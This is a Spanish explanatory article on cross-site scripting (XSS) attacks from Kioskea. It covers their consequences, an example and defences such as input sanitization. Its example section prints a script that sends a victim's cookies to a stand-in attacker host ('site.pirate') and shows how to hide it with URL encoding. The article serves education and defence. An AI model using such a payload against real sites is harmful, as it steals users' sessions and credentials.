Documente Academic
Documente Profesional
Documente Cultură
Junio 2014
Consecuencias
Gracias a las vulnerabilidades de las secuencias de comandos entre pginas Web, un pirata informtico puede usar este mtodo para recuperar datos
intercambiados entre el usuario y el pgina Web al que ingresa. Por ejemplo, el cdigo inyectado en la pgina se puede usar para engaar al usuario y
hacer que ingrese informacin de autenticacin.
Adems, la secuencia de comandos inyectada puede redireccionar al usuario a una pgina Web controlada por el pirata informtico, probablemente con la
misma interfaz grfica que la pgina Web comprometida para engaar al usuario.
En este contexto, la relacin de confianza que exista entre el usuario y el pgina Web se ve afectada por completo.
Ejemplo
Supongamos que la pgina de inicio de CmoFunciona.net es vulnerable a un ataque por secuencia de comandos entre pginas Web ya que en ella
puede aparecer un mensaje de bienvenida con el nombre del usuario como un parmetro:
http://es.kioskea.net/?nom=Jeff
Una persona malintencionada podra llevar a cabo un ataque XSS al proporcionar a la vctima una direccin que remplace el nombre "Jeff" con un cdigo
HTML. En especial, podra transferir el siguiente cdigo Javascript como un parmetro para redireccionar al usuario a una pgina controlada por el pirata:
<SCRIPT> document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie </SCRIPT>
El cdigo anterior recupera las cookies del usuario y las enva como parmetros a una secuencia de comandos CGI. El siguiente cdigo transferido como
un parmetro sera demasiado obvio:
http://es.kioskea.net/?nom=<SCRIPT>document.location ='http://site.pirate/cgi-bin/script.cgi?'+document.cookie</SCRIPT>
No obstante, la codificacin de la direccin URL permite ocultar el ataque:
http://es.kioskea.net/?nom=%3c%53%43%52%49%50%54%3e%64%6f%63%75%6d%65% 6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%5c%27%68%74%74%
Proteccin
Los usuarios pueden protegerse contra los ataques XSS al configurar sus navegadores para impedir que se ejecuten lenguajes de secuencias de
comando. En realidad, esto no brinda una solucin ptima para el usuario ya que muchas pginas Web no funcionan adecuadamente cuando se prohbe la
ejecucin de un cdigo dinmico.
La nica solucin viable para impedir los ataques por secuencias de comandos entre pginas Web consiste en disear pginas Web sin vulnerabilidades.
Para ello, el diseador debe:
verificar el formato de los datos ingresados por los usuarios
codificar los datos visibles del usuario remplazando los caracteres especiales con sus equivalentes en HTML
El trmino "sanitizacin"(sanitation en ingls) hace referencia a todas las acciones que contribuyen a proteger los datos ingresados.
Ms informacin
Asesora de CERT acerca de las etiquetas HTML malintencionadas CA-2000-02 incorporadas en las solicitudes Web del cliente
CERT: Cmo reducir el contenido malintencionado para desarrolladores Web
Cross-Site Scripting attacks Angriffe Cross-Site Scripting XSS - Cross-Site Scripting XSS - Cross-Site Scripting Ataques Cross-Site Scripting
Este documento intitulado Ataques de secuencia de comandos entre pginas Web (XSS) de Kioskea (es.kioskea.net) esta puesto a diposicin bajo la licencia Creative Commons. Puede
copiar, modificar bajo las condiciones puestas por la licencia, siempre que esta nota sea visible.